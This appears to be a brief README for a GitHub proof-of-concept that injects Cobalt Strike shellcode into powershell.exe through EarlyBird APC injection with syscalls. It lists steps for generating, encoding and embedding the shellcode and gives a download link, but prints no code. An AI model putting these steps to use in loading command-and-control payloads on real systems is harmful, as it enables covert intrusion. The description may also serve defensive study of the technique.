A poc of using the tech with syscalls on powershell.exe.
Injection of cobalt strike shellcode to powershell.exe using the EarlyBird Tech.
- Select a profile picture of choice.
- Generate a x64 https shellcode (in C format).
- Paste the code in encoder.py and execute it using Python2
- Copy and paste the output in https://github.com/ORCA666/EarlyBird/blob/c6be7c912cdaad15b358c44b734c4118e70cb2dd/APC-Injection_updated/main.c#L157
- If the key was changed, change it in main.cpp as well.
The intended use for the tool is strictly educational and should not be used for any other purpose.
Download Link: https://github.com/ORCA666/EarlyBird